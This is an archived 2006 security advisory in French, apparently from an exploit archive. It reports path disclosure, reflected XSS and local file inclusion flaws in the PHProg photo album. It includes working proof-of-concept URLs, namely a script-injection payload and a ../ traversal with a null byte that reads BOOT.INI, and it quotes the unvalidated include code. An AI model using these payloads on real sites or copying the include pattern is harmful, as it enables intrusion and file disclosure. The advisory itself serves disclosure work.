PHProg.txt

PHProg.txt: Posted Sep 13, 2006; Authored by cdg393; PHProg suffers from cross site scripting and local file inclusion flaws.; tags | exploit, local, xss, file inclusion; SHA-256 | 93b466caa26b9cce7db8eca898f622659062b5ef5a00507d7dd04e38b62450b4; Download | Favorite | View

PHProg.txt

------=_Part_3877_18013116.1157965429026
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

(11/09/06)

* Produit vuln=E9rable : PHProg ( Album photo en PHP )

* Site officiel du produit : http://www.PHProg.com/

* Failles de s=E9curit=E9 d=E9cel=E9es :

1] Full path disclosure : http://localhost/PHProg/?id=3D1&album=3Dcdg393

2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=3D1&album=3D
<script>alert('cdg393')</script>

3] Local File Inclusion  :
http://localhost/PHProg/index.php?lang=3D../../../../../../BOOT.INI%00

     Ligne 59        =3D>              $lang=3D$_GET['lang'];
     Ligne 61        =3D>              include("lang/$lang.php");

* Credits : cdg393 : cdg.new.fr =3D)

------=_Part_3877_18013116.1157965429026
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

(11/09/06)<br><br>* Produit vuln=E9rable : PHProg ( Album photo en PHP )<br=
><br>* Site officiel du produit : <a href=3D"http://www.PHProg.com/">http:/=
/www.PHProg.com/</a><br><br>* Failles de s=E9curit=E9 d=E9cel=E9es :<br><br=
>1] Full path disclosure :=20
<a href=3D"http://localhost/PHProg/?id=3D1&album=3Dcdg393">http://local=
host/PHProg/?id=3D1&album=3Dcdg393</a><br><br>2] Cross Site Scripting (=
 XSS ) : <a href=3D"http://localhost/PHProg/?id=3D1&album=3D">http://lo=
calhost/PHProg/?id=3D1&album=3D
</a><script>alert('cdg393')</script><br><br>3] Local File Inclu=
sion&nbsp; : <a href=3D"http://localhost/PHProg/index.php?lang=3D../../../.=
./../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=3D../../../../.=
./../BOOT.INI%00
</a><br><br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne 59&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp; =3D>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp; $lang=3D$_GET['lang'];<br>&nbsp;&nbsp;&nbsp;&nbsp; =
Ligne 61&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =3D>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; include(&quot=
;lang/$lang.php");<br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbs=
p; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &n=
bsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &=
nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;<br>* Credits : cdg393 :=20
<a href=3D"http://cdg.new.fr">cdg.new.fr</a> =3D) <br><br>

------=_Part_3877_18013116.1157965429026--

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

PHProg.txt

PHProg.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHProg.txt

Share This

PHProg.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems